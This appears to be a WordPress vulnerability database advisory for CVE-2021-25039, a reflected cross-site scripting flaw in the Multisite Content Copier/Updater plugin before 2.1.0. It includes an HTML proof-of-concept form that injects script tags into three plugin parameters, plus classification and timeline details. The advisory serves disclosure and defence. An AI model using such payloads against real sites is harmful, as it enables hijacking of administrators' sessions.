WordPress Plugin Vulnerabilities

Multisite Content Copier/Updater < 2.1.0 - Reflected Cross-Site Scripting

Description

The plugin does not sanitise and escape the wmcc_content_type, wmcc_source_blog and wmcc_record_per_page parameters before outputting them back in attributes, leading to Reflected Cross-Site Scripting issues

Proof of Concept

<html>
  <body>
    <form action="http://example.com/wp-admin/network/admin.php?page=wordpress-multisite-content-copier" method="POST">
      <input type="hidden" name="wmcc_content_type" value='"><script>alert(/XSS-content_type/)</script>' />
      <input type="hidden" name="wmcc_source_blog" value='1"><script>alert(/XSS-source/)</script>' />
      <input type="hidden" name="wmcc_record_per_page" value='10"><script>alert(/XSS-record/)</script>' />
      <input type="hidden" name="submit" value="Filter" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

Plugin icon
wp-multisite-content-copier-pro
Fixed in 2.1.0

References

CVE
CVE-2021-25039
URL
https://www.hackpertise.com/cve/26-cve-2021-25039/

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
6.1 (medium)

Miscellaneous

Original Researcher
Asif Nawaz Minhas
Verified
Yes
WPVDB ID
c92eb2bf-0a5d-40b9-b0be-1820e7b9bebb

Timeline

Publicly Published
2022-02-07 (about 2 years ago)
Added
2022-02-07 (about 2 years ago)
Last Updated
2023-04-12 (about 1 years ago)

Other

Published
Title
Published
2023-02-15
Title
Inline Tweet Sharer < 2.6 - Admin+ Stored XSS
Published
2023-08-21
Title
WP Adminify < 3.1.6 - Admin+ Stored XSS
Published
2024-04-12
Title
Remove Footer Credit < 1.0.14 - Authenticated (Administrator+) Stored Cross-Site Scripting
Published
2023-04-19
Title
Category Specific RSS feed Subscription < 2.3 - Admin+ Stored XSS
Published
2017-06-29
Title
Postman SMTP Mailer/Email Log - Cross-Site Scripting (XSS)